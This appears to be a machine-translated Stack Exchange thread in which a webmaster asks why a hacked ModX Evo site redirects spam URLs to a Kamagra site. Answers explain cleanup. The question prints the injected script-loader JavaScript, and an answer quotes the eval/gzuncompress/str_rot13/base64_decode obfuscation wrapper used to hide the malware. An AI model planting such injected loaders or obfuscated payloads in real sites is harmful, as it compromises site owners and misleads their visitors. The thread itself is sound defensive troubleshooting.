首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >问答首页 >网站黑客:重定向到其他网站?

网站黑客:重定向到其他网站?
EN

Webmasters Stack Exchange用户
提问于 2014-01-29 05:01:43
回答 2查看 805关注 0票数 1

我有一个网站,似乎和工作良好。

然而,如果你在谷歌上搜索它,还会出现很多其他链接,例如:

mysite.com/kamagra-viagra.html

点击这个,我会被重定向到Kamagra站点。

我已经扫描了我的网站病毒和找不到任何东西。

我正在使用ModX Evo。

有人能建议我应该找的一个特定的文件导致这种情况吗?

编辑:

我注意到我的头上有一些奇怪的Javascript:

代码语言:javascript
运行
复制
<script type="text/javascript" src="http://www.mysite.com/home.html?getjs=metric.js"></script>
<script type="text/javascript">var j1s = document.createElement('script');j1s.type = 'text/javascript';j1s.src = 'http://www.mysite.com/home.html?getjs=metric.js?getjs=metric.js';var h1ead = document.getElementsByTagName('head')[0];h1ead.appendChild(j1s);</script>

这不是在我的模板文件中,而是在加载页面时出现的。我怀疑这就是问题所在。

EN

回答 2

Webmasters Stack Exchange用户

发布于 2014-01-29 05:24:35

有无数的可能性。您的.htaccess文件可能会受到破坏,并且正在对重定向语句进行评估以将用户发送出去,但这是一个相当直截了当的攻击,很容易找到和修复。

更有可能的情况是,您的CMS核心文件中有一个或多个已经注入了模糊代码,这段代码在每次访问时都会运行,从而生成用于Googlebot消费的垃圾链接,并注入一个JavaScript来将用户发送出去。这里的诀窍是找出哪些文件被修改了,攻击者是如何获得访问权限的,这个过程对于非安全培训人员来说是非常困难的。

还有一种可能性是,包含站点内容的数据库已被破坏,恶意代码也被注入其中。如果您没有对内容进行适当的安全备份,这可能对站点造成致命的影响。

无论如何,仔细阅读上述场景会产生两个基本问题:

  1. 他们是怎么进来的?
  2. 他们改变了什么?

最明显的跟进是“我该怎么解决它?”

除非您有很多诊断和修复安全问题的经验,否则您可能希望将此留给专业人员处理。有顾问将这样做,以及基于订阅的服务,如停止黑客或Sucuri。

票数 2
EN

Webmasters Stack Exchange用户

发布于 2016-01-14 10:34:44

这是一次黑客攻击,似乎已经破坏了几个MODx Evo过时的安装。我刚修好了,这是我需要做的:

  1. 在MODx管理器中,转到元素>管理元素>插件>“快速ManagerManager”。
  2. 搜索代码@eval(@gzuncompress(@str_rot13(@base64_decode( (我发现它在文件底部附近)
    • 这是编码的恶意代码,它导致将metric.js脚本插入到您的主页顶部。

  3. 删除此非常大的行并单击“保存”。
  4. 现在转到Plugins >“突出显示搜索”。整个插件似乎都是被攻击插入的。
    • 这将导致您网站上的urls (如/最佳网站-kamagra)重定向到另一个站点。我通过搜索数据库中的str_rot13找到了它。

  5. 删除这个插件。
  6. 转到元素>管理文件>资产目录,并删除'cache‘目录。
  7. MODx Evo分布上传一个干净的资产/缓存目录。
票数 0
EN
页面原文内容由Webmasters Stack Exchange提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://webmasters.stackexchange.com/questions/57606

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档